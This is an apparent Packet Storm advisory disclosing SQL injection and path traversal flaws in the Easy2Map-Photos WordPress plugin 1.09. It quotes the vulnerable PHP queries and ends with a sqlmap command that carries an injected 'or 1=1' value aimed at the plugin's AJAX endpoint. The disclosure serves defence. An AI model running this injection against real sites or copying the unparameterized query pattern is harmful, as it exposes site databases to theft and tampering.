WordPress Easy2Map-Photos 1.09 SQL Injection

2015-07-08T00:00:00
ID PACKETSTORM:132613
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2015-07-08T00:00:00

Description

                                        
                                            `Title: SQL Injection in easy2map-photos wordpress plugin v1.09  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-06-08  
Download Site: https://wordpress.org/plugins/easy2map-photos  
Vendor: Steven Ellis  
Vendor Notified: 2015-06-08, fixed in v1.1.0  
Vendor Contact: https://profiles.wordpress.org/stevenellis/  
Advisory: http://www.vapid.dhs.org/advisory.php?v=130  
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.  
Vulnerability:  
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.  
  
48 $wpdb->query(sprintf("UPDATE $mapsTable  
49 SET PolyLines = '%s'  
50 WHERE ID = '%s';", $PolyLines, $mapID));  
218 $wpdb->query(sprintf("  
219 UPDATE $mapsTable  
220 SET TemplateID = '%s',  
221 MapName = '%s',  
222 Settings = '%s',  
223 CSSValues = '%s',  
224 CSSValuesPhoto = '%s',  
225 CSSValuesMap = '%s',  
226 MapHTML = '%s',  
227 IsActive = 1  
228 WHERE ID = %s;",  
229 $_REQUEST['mapTemplateName'],  
230 $_REQUEST['mapName'],  
231 urldecode($_REQUEST['mapSettingsXML']),  
232 urldecode($_REQUEST["parentCSSXML"]),  
233 urldecode($_REQUEST["photoCSSXML"]),  
234 urldecode($_REQUEST["mapCSSXML"]),  
235 urldecode($_REQUEST["mapHTML"]), $mapID));  
  
  
238 //this is a map insert  
239 if (!$wpdb->query(sprintf("  
240 INSERT INTO $mapsTable(  
241 TemplateID,  
242 MapName,  
243 DefaultPinImage,  
244 Settings,  
245 LastInvoked,  
246 PolyLines,  
247 CSSValues,  
248 CSSValuesPhoto,  
249 CSSValuesMap,  
250 MapHTML,  
251 IsActive  
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);",  
253 $_REQUEST['mapTemplateName'],  
254 $_REQUEST['mapName’]  
  
  
331 $wpdb->query(sprintf("  
332 UPDATE $mapsTable  
333 SET MapName = '%s'  
334 IsActive = 1  
335 WHERE ID = %s;",  
336 $_REQUEST['mapName'],  
337 $mapID));  
  
Also  
  
In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:  
  
if (!file_exists($imagesDirectory)) {  
mkdir($imagesDirectory);  
}  
  
CVEID: 2015-4615 2015-4617  
OSVDB:  
Exploit Code:  
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3  
`